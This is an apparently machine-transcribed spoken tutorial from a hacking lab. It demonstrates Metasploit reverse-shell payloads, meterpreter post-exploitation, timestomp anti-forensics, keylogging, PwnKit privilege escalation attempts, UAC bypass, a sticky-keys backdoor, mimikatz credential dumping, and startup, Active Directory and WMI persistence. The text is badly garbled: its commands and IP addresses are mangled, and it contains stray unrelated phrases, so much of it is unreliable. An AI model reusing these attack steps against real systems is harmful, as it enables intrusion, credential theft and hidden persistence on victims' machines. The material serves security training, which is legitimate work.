without error we can get it. So this and all you just need to do it. The payload arch is incompatible with the Windows meter printer platform. So what is this? So we have misused. Okay, I have made a mistake here. Let me just type here. So platform for X Windows minus a x86 then minus e x86. So then we can get here the right payload now. So before that we just type ls a backdoor.linux. That's it. I just type it here. Now we just run this backdoor. Now before running this backdoor, now what we would like to do here is, now we just need to give a payload. We just need to give a permission. So just type ch chum minus r www data. Just type www a data. Just type where www html and you just type share. That's it. So we're done now. Now let's come back here. So where I have created a, now just type this minus a
The payload here is backdoor.exe. Now just type copy a backdoor.exe to you just put here is where www html, then just type share. Now just type plus minus l where w html and just type I have here now a backdoor.exe. Now without wasting a time here, now just type it as msf console. Now we would like to start the Metasploit. Now we just type exit from here. I just type clear. So we have copied this one. Now we have enter our target IP address is config is the same. The target IP address is 68. That's great. Now you just use here like we can utilize as again. Now just type use exploit. So, I would like to copy this. Just copy. Now I just type clear here. So I just type use exploit multi handler. Now set a payload. Now just go for set a payload for a Windows meter reverse underscore DCP. Just type set lhost and your target IP address 192.168.18.68. Now let me I would like to look here. The machine could not be changed. Why it shows a small thing. I would like to make it as a little bit big. Now I would like to look this. It's okay. Now just enter our target IP address is 68. Not for CPS. So don't go for CPS. Clear is settings. I would like to go for everything. I just type clear. Just come back. Just enter your target IP address 90.168.18.68. So I have made a mistake here. Means I not yet even name the Apache server. So for that we would like to look here is service Apache 2 start. So here it does not check. Now let me just type clear. So just type sudo su sudo service Apache 2 start. Now it was started. Just type systemctl status Apache. Now it was running, so I just type exit and I just type clear. Now let me just come back. So you would like to delete again here, and you can get just do this. So just close, come back, just enter your target IP address 18.868. Now it was running. Now if you look here as a share where you have got here a backdoor.exe. Now let's come back here. Now we have set up here the host. Now just type here as show options. Here is nothing else, so now just type here exploit j minus jet and press enter. Now exploit running background with the job 0. Exploit completed but no session was created. Now it was running in the background, so we don't need to worry. We just click this backdoor.exe and I just click on run this. Now we just look here where I have got a session is created. Now we just type here as a you just come back here, you just type sysinfo. I just type sessions
Just type sessions minus I1. Just type sysinfo. We get the system informations. Then I have typed here as ipconfig. You get the my targeted IP config. You can look here a software with a loopback. This is my targeted IP address. So where we have got it. Now later. Now we just type here as get UI the user ID. Then we just look as pwd. The current working directory will differ according to where you have saved the backdoor.exe file. Therefore, the images on the screen might be different on the lab your hacking environment. Now just type a list where you can get look enter of your list everything. Now we just look here. I have a work.txt. Now here a work.txt. So in this work.txt, how interested keywords. So we have seen here a work.txt. So in this case, while performing exploration activities, an attacker tries to access the files and read their contents upon doing a modified access created entry attribute. Immediately change indicates the file users or owners that someone has read or modified. So to give no traces on the modified access created entry attributes, immediately change with we would like to utilize the timestamp command to change the attributes to wish to access the files. So for that, we just use a type stuff and just type work.txt then minus v. So timestamp we will like to have this timestamp it has a specified path to be present here. Okay. Timestamp specified path is this one is copy. Let me I just paste this. Then work.txt minus v. Privilege escalation get a file name operation user the system cannot find the file of specified. Now I would like to go here as
you make egg rice.
desktop. It not get. Okay. Does not matter now. We have utilized a timestamp. I would like to put as work.txt.
This one.
Now minus m. So I just specify a date like 1/01/2025.
And I say he required
Ah.
fast. So he coming
You just
by,
need to specify like 1200. That's it. We would like to look the settings specified MAC attributes on the work.txt. Now we have got here. Now we would like to look as time stop work.txt minus v. Now you can look here. We are getting here a modified and access created. So which I was created today and modified in this time. So similarly, you can access the and create an entry here. So for that, if we would like to look here, that what we would like to here is now we would like to we just use a search option. So it must to be a script file or a globe for search. Okay. For that, we just go here as cd the folder. Now just type as cwd, then just type here as search minus page file dot ss. Now let's look what else we get from here.
I'll get no it's
Yeah.
I'll get no it's
So it will start for exporting this one. To look at then if there's something else we can get it here. So then it was found one results with the key page file dot system.
So we have get access of that file. You can see here. Now, that you have successfully exploited the system. Now you can perform a post-exploitation like maneuvers such as key logging, everything. Now, we just utilize as key scan start. Then we would like to start here. Nice try as key scan start. Starting the keystroke sniffer. Now, now we just here. Now, we would like to go to our Windows machine. Now, if here anything we would like to modify this, where is this? Just, this a1.txt. Hello, Pedestrian Club. I just type for us. Please subscribe. I just modify this one. I just click on file. I just save. Then I just close this. Now, that was done now. So we just modified here is something that we have done now. Now what we like to do here is now we just type here as a key scan. Now I would like to dump the data. Dump captured a keystroke, but I not yet captured anything else apart from here. So that's the mistake. Otherwise you can get a result here. I can snip here. Key start scan. Start incorrect function. So it now have a starting this one. So I think it's already started. Now I don't want to download this one. I would like to put here as a register. So I just make it as a little bit faster. So I just make it as modify. Now it is dump here. So the dumping capture, what else the data which you have put here, that will be displayed here. That's it. But it not taking here. So I just type here as ideal time. User has been ideal time for 18 seconds after hours in the remote system. Now we just type here as a shell. Now we just came to here a shell. I just type directory. We just type a H and enter. You would like here in the directory. Recycle bin documents, profile, system, program data, recovery, bytes, XYZ things. We have seen everything. So now it's a very EX service state equal to R. Then just enter. So it will search all the query type. Now I can here in this case what else is available, everything. It will be displayed here. Now you just type net just type firewall show state. Now the firewall state we did here. Now I can look at profile is standard, operation mode is disabled, Windows Defender firewall, it was everything is disabled. Otherwise if it enable, then you can't able to get access to all these things. So just type sh that firewall show config. So we can see all the firewall configurations here. That's it. Now you just WMIC there. We just present a node that we just look here as product, get name, version, vendor. So I would like to get all this product, get vendors. So you can look here. So in this WMS node product game version, so Java 8 update is is versions, vendor, everything which was inside our big issue. So now just type WMIC CPU get. You can look here you can get the CPU information. So this is look like a bit clumsy. We cannot able to read all these things here. Now, WMIC user account name SID. We can look here where we have got here a administrator and default account, guest account, and a server account, which they have 501, 503, 500, 504 SI. So now I will read from this. So I have here as now support. You would like to list your Windows machine. Now I'd like to here without touching this machine. Otherwise, this machine WMC OS where it's type here as a primary equal to is type true. That it is type reboot. Now Metasploit session 1 was closed and it was done. Now you can look here. It was rebooting the machine. Look. So apart from aforementioned post-exploitation commands, you can also use many post-exploitation commands. So that I will do in the so that's it. This concludes how to hack Windows machine using a Metasploit and perform a post-exploitation using a Metasploit session. That's it. So now we are discussing about SNMP privilege by exploiting vulnerability KEXs. As from the KEX vulnerabilities, you can call it as 2034. Also on APW, it actually discussed a privilege escalation attack. Vulnerability exists in the PKEXEC utility, a component of a kit package. It allows an unprivileged user to execute the API code as a root user due to an improper handling of MNP. So here, first of all, how would you like to understand this vulnerability? So it will affect the component like uploading PKEXEC utilities. It causes the improper initialization of environment and impact our local relations like upload kit versions here to patch a released area 2022. Now we would like to look this. So now just come back here. Now just make us look big. I suppose this. Just type except let's try. Now let's try PKE XEC. Let's try here as a version is I have got here as version is 125. So that does not matter for us. Now we would like to look here as to now here with the Pentester Club. Okay, that's a little bit great. Now just open your files. Now let's we would like to look here as just type here EXEC XEC CV 2022 404. I would like to get this exploit. Let me just open this in new tab. So this is available. Okay, that's a little bit great. Now just copy this, come back here, you just type git clone and fill this repository. So where we have cloned this repository. Now I just need to make a directory to a temp directory and pwd kit. So now like to here move this one, just copy, then I can this to a temp and pwd kit where I have moved now. Now we'd like to successfully move now. Now I just type cd pwd kit. I just type clear. I just type list minus n. Now here we have cw kit. I just type this. We just need to walk to this directly cd. Just press it. And I just type list minus n. We like to run like pwd kit.crx where the things we have available. So you can type your as imp then where it was done here the make command everything. Now we just type clear. I just type plus minus. Now I have here CVE 2021 4034. Now I would like to run this. That's it. And enter. CLAB cannot what message could not be opened or converted with the
UTF-8 to prevent kit. The value of the shell variable was not found in the ECR shell files. So the incident has been reported. You just try to escape, enter your password, and just copy. Now, I would like to run this. Now, it's also the same thing, just exit, let's try here. Now, start the ones here. So, we have get an error here. Now, I would like to remove this. Now, just write it as that bash. So here this was created the exploit, but it was not a bash. Let me just run this as SH. Let me like to look here. This instance has been reported. Could not be converted from PWM. So after we just get this one, okay, make with the CV and enjoy the shell. So okay, and just execute with the make of. We just try with our own thing, but it's not out. Now let's back here. Now we would like to get task here. Now we just try plus minus here. Start remove this. Just right here. Now just type make. Then let's just paste it. Now we must get an output here as now. We would like to put this echo with module with activity. Now let's what we would like to do here. Just copy. And we would like to paste this, then copy with the so and so. Now let me just do this now, here. So I just copy here. Then let me run. Convert with UTF-8, so it have error. So where we have this even if we try one, it's not marked out here. So we just remove this, come back, see, remove my start, then let us press this. So let's go back here. So just try CEH and PWM. So it's not going to work out now. I can try as another one. Let's we would like to look this. So that gives an error of because it's outdated work. That's why it's not going to be give anything else. We like to look that here in this. We just look. Otherwise, we just look this PW hit for manually. I think now let's just test this. So we just look this so one by one. So just copy and paste it. That's done. Now we just need to a permission, just copy, paste it. That's done. Now we just interactive shell. We just run this. Fail to a copy of file to exist. Now just type plus minus L. Now type PW and fail to copy file exist. Type plus L. Okay, array minus RF. PW and hit. So we need to delete. So sometimes it may give a long multi-time process to process a single type of outdated exploits. And let me just paste it. That's it. Now we will keep using one command, single command is the single command Just type ID. We are with the Friends Club with a boxes video. So it's been updated even yet here. So we have failed this one. So it is a patch one. So that's why we are getting an error. Now let me just look this. Now where we would like to try this. Just copy, come back here and let's just paste it. Now we would like to utilize here as PWN kit ID. Just copy, come back here and paste it. Fail to copy a file is exist. So sometimes it may be a fail and sometimes it may be not going to be work out. So we are not we are failed in this case. It's not going to be came out. So otherwise we just try to remove minus. So there is nothing else to remove, just try plus minus here. Just type C, just type remove minus RF, PWN kit, I just type clear. So in this case, so we not it get succeeded here. We just try with that another one, then the last time we can try one more time, then let's we would like here also. So this only have one, so I just copy. Now I make directly PWN kit, just try C, AW kit, just type git clone, and let me just build this. Just type C 2002 24, just type here as make. Just type minus. So here how we would like to make so I would like to place here as GCC. Let's come back here. I just paste it here. Once this is done, now let's run this. Just copy, come back and execute it. So my system is not going to be vulnerable. That's it. So value of the set it's not going to work. So this vulnerability has already been patched in newer version. So now I'm using 2024 1 file management. So that's why if in 2022 it will be vulnerable. So here we are exploiting the vulnerabilities for the sake of demonstrating. However, the attacker can search a latest vulnerabilities in the target system using online resources such as XBTV, exploiters, and put the exploit and gain authorized access escalate on the system. So guys, now we are going to do another tutorial like escalate privilege by bypassing exploiting a sticky keys. So here, what is bypassing the UAC? So UAC has an authorized changes to a system by providing a use for administrative credentials. However, a certain misconfigurations or vulnerabilities can allow attack to pass it. Now, steps for a UAC like what is the step for UACs like here, number one is check the system privileges. Check a system privileges. So ensure the current user account has administrative privilege, but it restricted by UAC. Now, also it have UAC like locate a trusted bus. So UAC bypass after involves for abusing a trusted Microsoft signed by binaries like a fold helper, STD control, and execute a code without triggering a UAC. Now, number 3, that's it. Like example for using like a fold helper. So we like to use this a fold helper to bypass this UAC. Now, we would like to talk about sticky keys. So, what is this sticky keys? The sticky keys exploit allows a attacker to replicate the string. There was one setHC.exe file. It was input for a Windows, and with the system privilege before login. This exploit can be a privilege. Now, Now we would like to undo this. What now? We would like to switch to our application. Now just let us a little bit quick. Now here start listeners here. Now you just start as I speed as a little bit big. You just start in Sabina. Apply for a Windows meter printer. You just type here as reverse underscore DCP. Post equal to 192.68.18.is38. Let me just look here as I pick. Yes, 68. Then L port equal to let's put here as I like to put as 4455 minus F file. I would like to get the exe file that need to be saved. This file in sh. Now I just put as windows.exe. That's it. Now we would like to look here. Just type here. Now it will create without targeted machine. Now once this is done, now we already did in the previous lab sessions about all these things. Just to copy only, I just type here as list minus L. So just copy a windows.exe to. So I just put as before as so copy windows where a www html and share add our password where I just type minus L where a www html and share where I have got here a windows. So in meanwhile I would like to start my Windows machine. Let me I just switch on this. Now once this is done, now here I just type here as system serial status Apache 2 active running. So to bother, just type here as console. Now you just need to copy this one. So once you just copy, now let's just I type here as here. Now let's just come back. So you need to enter password. Just click cancel. This one also. Now let me just replace this. We would like to so just enter our type address. When I go up on 68.168 which is running. Now let's go to H. Then a windows.exe file is running here. Now let's come back here to your MSF console. Now just type clear from here. Now just type use exploit multi handler. Now you just type set payload and Windows Metapita. Oh, sorry. I have made a mistake. So that we have set L host equal to L host equal to 192.6.18.68 set L host double 5. Now just try run this. Now let it will start for TCP handler. Now let's copy our Windows machine. Now you just get this Windows. Now just click on run this. So now what is your get? Now let's switch back to Payload machine. Now in this type this is writing about some information. Now you just type get UI, getting get UI. Now this is type as background. Now we shall try to bypass the user control settings that's blocking from any unrestricted access to the machine. Now we just compare background. Now that session is running back there. Now we just type there are such bypass EAC. Now in this task we will bypass EAC protection via a root folder. For that, it presents a with the bypass US folder exploit. Is this one. So we would like to Windows by local bypass a port helper. Now we would like to utilize here as this one. We just try to use 90. Now let me type here. So we would like to type here as use exploit Windows local bypass US a port helper. Now we just type a set a session 1. Now we just type as options. That's it. In these options, set a host and payload options for Windows Interpreter. So that's correct. Now we do have here a target. The target I'd like to specify as so like this target 0. Now just as the export. Now this export is about because all has eliminated export completed but no sessions was created. I just try session. So yeah, I have a session over here. But here I not get this from here. So here we would like to look here is 0. So I just try clear this type as show options. Here I think we would like to change the port. Set L port equal to 445. Nice right here as a expert. Now this UC bypass a port helper which may not even getting back here. So we would like this. Now we would like to try this one more time. So we don't need to set up anything, so it's try set L4 equal 4444. Now just type set we would like to try here set a target 0. Now just like X1. It's not already related state, so it already bypassed the US, so you don't need after that. So now we would like to come back here. Now let's try a background. Now you just try a sessions. So our sessions is running. Now that does not matter. Now just try such a sticky keys. Now we would like to do like this, so just use 0. Oh sorry, let's try some here. I just use exploit multi handler. Now in this we like to use this as sticky keys, so just copy paste. Now start to 0 where we have come here. Now just try here. Now please try sessions stop. So I already have here a sessions with my stop. Now just type here as set session 2. I just want to put a session. Now you just type here as exploit. Key suddenly now launch exploit RT targets a shift 5 times. Now now what we would like to do is we just do is exploited this one. Now switch back to a Wix. Now which try as a command prompt. I just need to press a shift key for 1, 2, 3, 4, 5. Yeah, look here. Sticky keys allow you to use a swift control alt. A Windows logo. Keys has been pressed one key at a time 5 times. Keyboard shortcut turns into sticky keys. To press a shift key 5 times. This will command from the screen and its system is privileged instead of sticky keys error. Windows, the command word. Now, we just type yes. We just type UMI and here administrator. Now, we can see that we have successfully got a persistent system level access to our target system. By exploiting the sticky keys, this concludes the demonstration of making a persistent and exploiting the sticky keys here. That's it. You see here, it was that, but I have got the instructions. That's it here. So guys, now we are going to do as another topic as escalate a privilege. So escalate privileges to gather a hasher using mimikatz. So to escalate a privilege and gather a password hashes using mimikatz. So first of all, we would like to look here what we would like to have in the mimikatz and hash. So hash means we have like passwords that may be encrypted with anything else. We just now first of all we would like to as administrative privilege. We also need to be a disable the antivirus media, and we would like to obtain this access. So once we would like to obtain this access, now we would like to do here first. So we would like to do this. So mimikatz is like a post-exploitation tool that enables a user to save and view artificial terrain such as keyboard shortcuts and dump passwords from memory pins as well as hashes. It enables you to perform such as pass the hash and pass the ticket. It makes a post-exploitation lateral movement in a network. Now, we would like to stop the machine. Now just set. Now, can I just close this? Now, we are in the same thing here. Now, I'm changing here to the book is MSFNM payload for Windows Meter reverse underscore TCP. L host is same my file and cycles. L host I will have to change the file. I would like to get exe file, then I just need to put as here. Yes. That's it. Now, just enter. Now, it will generate the payload. That's let's try plus where www.html, then you just type shell. So where you can look here, we have that payload. Now I will copy in my list of options. So let's look here. I have my mimikatz payload in my targeted server. So we just like as circle. We just like cancel. So I use exploit set then use first reverse underscore TCP. Just start set equals equal to 192.168.3 of is 38 then set equal to now you just start run this. Now let us start here. Now set a metadata. Now it's come back size also. We just recognize here is mimikatz. Now just run this. Now once it's run, update successfully run. Metadata shell. Now you type here as info where you got here as info. Now you just type as get user. We get here. Now you just type background. Once you just come back to a background. Now in this task we the USA protections via a put helper resist. Now just type as search bypass basic a put helper. Just type 0. Now you type here as just type options. Now just type set session 1. Now please type as So there's some everything is clear from here. I just try set a type as I just try exploit this one. Now it's already elevated this. I bypass the US, so you don't to worry about this. Now we strike here. This is not very well. I'm not just strike here as now. I like to here as just write sessions. So just write sessions as I1. Now just write here as clear. Not work out here in this system. Now this is a backup. I just write here as clear. Now here what do you have to write this? Just write system -c. So, privilege elite, a guest system, operation page. The following is active. Name a 5 impressions in memory. Okay, no worries. I would like to just load the kiwi. Now, look at the kiwi extensions, which was loaded the kiwi. Now, let's try to as help with the kiwi. Now, you would like to look here all kiwi. Now, say dot. Just try is set. Your system execution may SSL is so SS secrets are used to manage the system local security process and context data such like password, internet explorer, password, service calls, passwords, and SQL passwords. But I don't have this. So let's try now. Say like the secrets. Not running a system execution may fail, so it's some issues here. Now, here we can't able to execute here because using with here, so just look fails we can execute here operations. So this for help by using US is not otherwise we can execute all these things. Credential helps may fail. So why it's so I have this laptop, that's why it's not going to be executed. Now let me again show you here in this case. Now where we have executed here, now let's see here back. So there we have here and get user ID. Then we have a background. Once you come to background, so bypass USB port help. Sometimes it can work. Sometimes if you have encrypted up, not going to work out. And set you need to set a session 1. Then try here. Then it was executed. Then you just type here. Then US set is default and bypass can be this setting is continued. Yeah, we would like to organize come back Windows system so this is our layer here. So in this case you will get this. So it's not get. So if you type your get system -1, then we can execute it. Then we just type get user ID. We have got it here. Net authority of systems, but we can get here. We feel a QE, and you just type here as a help that will be taken here as help to solve this. So we just type here as a help. Then we can look here lsa down as send and .txt to read 2.txt. I would like to take here as so compare this 38% that this is exceeded. Our base is approximately 2.1 and extra 4 lines was added into this thing. Now that we will have to look here. Now it's a original data. There is nothing else is here apart from here as well as things. Now let me just come back here. This is so you can look at here is our here. So this concludes the demonstration of how to hide data using white space stenography. So guys, we are discussing image stenography using a Post-exploitation and C online. So we are to hide a secret message or files inside an image. Not altering is useful. Appears to write a open C and C on to make the processes simple and accessible. So now let's like to install this. So let me I would like to get a password stick. So I already have this one. So I just installing this. I install for just click on next. Install was finished. Let's close this. Yes, now I'd like to here. I would like to get which one secret. So that I would like to get library from so here. So just like plus a Firefox. Now this so language. So like get this. So save images in the desktop. Now just plus. Now I have one. Okay, now just to create a set of just as secret.string and sales come back here. Where is a set document? Then cover file is a line of that's in where I like to go in the desktop as open. Now you can get options. So you want to get options is encrypted. So you use encrypt like AES26, AES128. So I like to use AES128. I just get as one array over 1.5. Let's just 1.5. Now just hide from data. Now this is entered. Now you can look here. We have get the same thing. This. Now we have one. Now I would like to come back to this. Now we have hide data. Now let's go to now let me now I would like to track data. Now I would like to slide here. I just have one. Like I just here and super okay. So the thing about is this IP, and then output this file to place files. Output is in the desktop folder. Now I just open. Now password. So what else you have encrypted the password is encrypted. And then you just will extract this one to extract the cover file to a secret.txt file. You can here there is secret.txt. Type this up where we are using exactly the same thing. So you can buy the same thing only. That's it. So this concludes the demonstration how to perform image stream using OpenStreetView and StreetFormat. So both are the same way. If you want to try as well, like just try as state this is one. To upload image, this one. Yeah. Embedded files are data. Embedded data is embedded data is and try 0. So now let's download this. Now download it. Let's come back here. No, this one. I would like to press a reverse. Exactly. Now I'd like to extract data. What else is out here? And extract. So this will match the exact element to do. So I forget which I was utilized. So the ASCII will be presented here. That side is it's in the same case in this case here. So while perform online it's stored data, so this uses only the real case tools, otherwise we get to it by using because they say we implement something. So this concludes the session how to perform functionality using so and so. So we should do settings offline. If you buy online, that's irrelevant. So we can first. So guys, now here you as very interested by using a boot organ, how to sort. So once you have created your target machine, so if your machine died, so we want to get a auto start this, create a agent. So using a boot or logan, auto start is common tech used by attacker to maintain a resistance on operating system. Starting with execute graphically, the start attacker can ensure the malware is relaunched every time it is restarted. So first of all, we would like to utilize this one. So go to your files. Now just as Sabina payload. I would like to change the same thing. Okay, for Windows with Twitter, Windows and OTC. You just change the port to 6. Then now you just here as exploit.exe. Okay. Please let the payload exploit.exe. Here. Now, here, the x.exe is created. Now, I just need to throw this one into our Apache server. So, sorry, exploit www.channel, and just write as here. Oh, sorry, exploit.exe. So, exploit.exe, and then just write here. So here we have an Apache server that easily accessed in the Now let's come back. Let's check out MS server. Now let's copy this. 6. Now we are just writing exploit multi and I just write save for metadata and the let's just set L equal to 12.163.80.6 equal to 6666. I'll just try run here. Now CD handler. Now let's come back here. Just back like this. Just patches versus x y.exe. Now just run this one. Successfully executed. Now you got here as shell. Like this, get I. So it's get user ID. You got get here as background. It's in the background. Now, what we use search was USC. So what else work? So it not work out even in this case. But so you have the option one. Now just try the options. Then now let me just try clear my try set a target. I just try exploit. So we didn't get this because exploit UAC. So I would like to go for expressions. Now just type expressions once up. Now just type I would like to go to a C folder. Uh, just put a program data and start menu. Then just type programs. Then startup. Then I like looking this go to program files. Here now have the start menu. Then we would like to look this. So the same thing now let's do run without the system find the file of the specific path. Okay. Right, we just look here. Here no have a program files or program. We like here as a program data. No, I get this. So program data no have. So in this case I don't have any type of a program data here. Now if you don't have any type of program data, now let us do one thing. I would like to print this. So otherwise you try passage in this update data. So it's not going to work well. So now let's look here. So I'd like to class Windows Defender window share. So I just here as desktop mode. Now I just class empty. So I would like to utilize this one. So just copy. Come back. I just type cd. Just put that's it. I just type WD where you're in the desktop. Now in meanwhile like to what I just type here. You just type now for those better and just type also lhost equal to there equal to 77 file type is exe. Then you just type as payload.exe. That's it. So where the file is come here. Now let's copy this. Now just type here as upload as such. Now just type as payload.exe and enter. Now it was uploaded. Now we have successfully uploaded into that machine. Now you can also look here. After I click minimize this, close this, payload.exe without a user access. Now now what I'm doing here is so in this. Now I like as install. Let me launch this. So let it launch. This is what and just try set a come back to paste. So we have done in wrong like this. So where we have after one now. Then I would like to restart this. So I would like to restart. Yes. Now once this is restarted, then let's come back here. Now let's try this. The settings levels need to run 60 set L4 start exploiting. Now let's see here this send we will now let it be done. Let's see and it's like root let it look like this. So it was dead, but I listed it a bit more. Sure, just back to like this. We start. So if you add this way as whenever add this step, but I don't have a program because we add so it was added. But we add so this is what they have added is you are going to be add after restart. Okay, once you restart, but Windows 9 after I do have this code. Now you can look at my system that may be available. So that's here is a data. That's what we can't able to use. If you add in the something like there, if you last that is yeah, we like here there is some sample. Like we do as to others in like this one system. Microsoft is one Windows .NET. So you can we have that one for that once installed here that make sure this you can hear so this a 4 helper it's not for our data which and like 0 now like this we just add a program so what we do as now we have this so like this so it's a that's how directly I understand. So it's a time I have space here. So this is as so to conclude the demonstration how to maintain a resistance by using outdoor takes what we look here we have done is just upload the page. Restart the session will be once you need to use what we have later. One is we have added that one into a auto execution in this drop-down box. It will be so in my drop box I will be now in the determination on the OB object that is window. So in the auto is going to the begin. So if I unsuspend that, then we can already connect it. So guys, now it is just by exploiting an active directory access. So in active directory settings or maintaining persistence in a collision. By manipulating active directory such as user groups or systems, attack can ensure a complete access even if the system is a credential are changed. We like to hear is we come back to our mission now in this nice try. I'm suffering now paying for the interpreter in the same thing. Now I would like to utilize the same thing is table one. It was for active directory. Now just like this active directory. Now let's just open this. Here, that one and directory. Now let's switch to clear. Now let's make it big. Just here as sudo copy for active.exe to and password that done. And so let's use the check. So let's try to export multi and let's try to for a Windows dot C let's try to evasion 22.3.18 sorry set we are post 192.1 set we are going to run instruction run this run just to www. Let's swap here as to just one just we just trying to share now there is AC just execute this just run let's connect here so now let's see that is strategy there let's it's like so I have this here some then loading I'll just try to let's try go and I have to go to see I use focus and it's I just look at now we came to a downloader. Now let's we would like to look at now okay. Now let's see up yes what is and where it was successfully what was successful now what is our next is let's see go back let's try to see Windows let's try to see is system like as power no it's not called PowerShell help system install get I just need to shell now I came to a shell now now what we would like to do is now as to history history type up here code okay now what we like to do here is now I see of explorer it uses the administrator and it as downloads now I can play downloads now I have here a for some class input with to a power to PS1 PS1 it was put in the mode now I can hear this so I just came on with the website now came on with the category info resource now as for PS1 import will part of found artificial quite a radio not part of yeah this is the way I would like to add here I would like to see as add object acknowledge yes brackets. Just type cn equal to s folder. Just type cn equal to s. Just type here principal set outcome is administrator minus v for variables minus rights rights for here. Let's execute here. Now here fully qualified command found command auto execution. So also now we would type here as a get a object a set name administrator is like please UIDs. So it's again this what things about this administrator of a small functions. So here not taking this. So when that directly it's more complicated here. Now I like to go here just back. So let's minimize this. I type here as server manager. Just on this. Click on use. So here as an active first of all, let me just look here. Click on next. So active let's see here active directory domain services, active directory service, active directory service, active directory rights. Now active directory. So just add this. So click on next. So I would like to add all the just active. Then network device and like just add next. I will reserve just right. So let's like to see first and like to go for active directory. So in this we think anything has to this one. Now we would like to look at how this will be done. So we would like to start this by explorer. So here we just upload into our target Windows system. Then escape in the first step we just try to execute this a power view of PS1. Now in this the system view power view PSM does not cause value more data. Now we try this but not work out. You try to system of the sample this step in must admin Martin is now we utilize all this here to proceed one. Now directory use a bit. So let's do this. So once we like to for active directory users on computers, then let add I would like to add one features. We would like to add one features. So once you add extra for the new user, then we back right on to that. So this one goes up here. See we would like to paste then we would like to paste then we try again here. Now let's have to look here up can get it other. Let's back here. This was this is put here. Okay. Now yes. I will restart. Now let's try this. Yes. Now let's wait. Now let's just start. Let's say delete. Now let's use it. Now let's a server manager. Now let's go back here. A tools here. Now in the tools, what we would like to utilize here is so we need to be a setup this one. So it goes one by one. Perform and additional configurations. Just type click on next. So it's not able to get. So this goes for it. Nice type click on tools. Act at manage groups, computer groups, managers. Now we came to now active directory user does. Now let's just look this. I don't have here top. So we need to set first the active directory a target domain. Okay, and only we get here. So here we just need to get everything. So this is directory. So we this access everything. So we what? So once you have kept here active directory, so you just need to be set up active directory. So your target here, you just enter your domain activities. that is log in this way. That's it here. So we can see the main control now is actually not under this doesn't establish. So this is a demonstration how I maintain domain persistence by exploring an Active Directory of that here. So now we are doing another manipulation using WMI. So here, what is WMI? Windows Management Instrumentation is the core features of Windows supports an initiative and operates system attack and exploit WMI to escalate privilege or maintain constraints or compromise system. WMI allows for the execution of commands remotely, the creation of a privilege task, and elimination of the subprocess, making it excellent for attackers. So, privilege using WMI. So WM might be leveraged for a privilege in these ways. Attackers execute the commands, scripts, or programs with a privilege if they already have a full system. Now, we would like to do this. Now, when they do a payloads, as one of a test on WMI. That's it. Now, let's utilize the next session. Just made a so, sense of video, Metasploit. Now, we just press. Then there is sort test. So now you get folder here. Now just ls here where I have this x. Let's do it here, which is script. Now in this I like to browse this 201 here. I like to file mi dot now you can change to so then we have get another step where double check this one unlock. Now we have here is MSF console. This is MSF console. Now you just type yes. Clear. That's all we get clear. Now, first I would like to export this x.exe. The x.exe is on 0. So, let's type here. Now, let's type use exploit. And let's type set a payload for Windows. I repeat as TCP. Let's type a post. Set a port to 1. That's it. Let's type run this. Now, then back to your machine. Now, let's just open this. Now, let's see. So here on this x.exe where we are going to run this. Now let's have computer shell. Now once I have computer shell, now to upload computer this one. So in this case, I would like to go back here. I would like to get yes persistence this one GitHub. So I would like to actually GitHub. So let's get this WM persistence. I say on 5 step. Just please come back this right and just put it here where what is WM persistence. Now we upload from my application from home, then search, then last thing is this copy straight. So there you would like to save this one. It's already in the browser, so you just upload. Now we have to upload this one. Now just try it was loading for shell successful. Now just try one shell. I just try as shell we have got here. Now let's try as a import module. Let's run WMI. Persistence PS1. It's a WMI. Persistence PS1. Now let me just click for WMI. The specified module is not because we like any module. So how it's not coming. So like for install persistence and try figure start wait, so this put here a payload let's do nice. So this is load. So this command need to execute from the attack. So a C folder as users administrator downloads, then press enter. So instructions, it's not exit here, the actual way here. I might have this by shell. So some don't need to be done in these commands. Now I type as Windows shell. Now just see it downloads. Now just here. This downloads as import view. Systems dot v1. So administration of this features is unaccepted. Now let's do this try PowerShell. Windows PowerShell. This run admin. Now I was running this. This try as downloads. This is put here as input. So I was input. And systems. So it was missing file specifications or redirection of it. It was accepted. So it's not going to be executed here. So it's not updated successfully here. Then if you can type here in with another file like install, so you have a persistence. That's why it's going to be a bigger here. Then you just type in payload from CEH. So it's not a nice. So I'll just press the what say 6. Let's see this. So this can be run by through the attacker machines. So but we are having attacker machines also. The same time we was getting in the Windows also. Why that here we have some import video. Let's try it as development. Persistence this one. It's like application.design. I environment equal with the figure. So it's not to work out here. Yes. It's not going to be worked out. So in this case, I can show you. There is what. Let's have executed here. So where we have this one. Now what's this option? This option what we are doing here. So if only with the 9% before. Now we try to execute this one. It's not even exiting here. Pause. It's like a little complete of the mission. So let's try this. Let me just copy this. Just copy. Now let's just try this. Install persistence. There install persistence is not recognized name of CMD, right? The part is error. So there is no persistence installed in the machines. So we can't back. So like that. Like this. This is not from this. Now, how to install? See. So I just try this. Let's move this. What is this output? So let's try yes. That is right. Let's see. Okay. Let's add more counters to the tree. Okay. Let's try yeah. Now we will back to the persistence. Let's see. Is so how a persistence we can get here. So now like this. Now if we just come here to client machine, we type here exit, just type exit. The is low option. We might be by here. For share, share this CIA port for share this CIA port coding my persistence peaceful. So here is now unexpected for in expression statement. A free provide. So even if I would like start like every night and just while something it will take a little bit more than 3 tasks. This number. So maybe I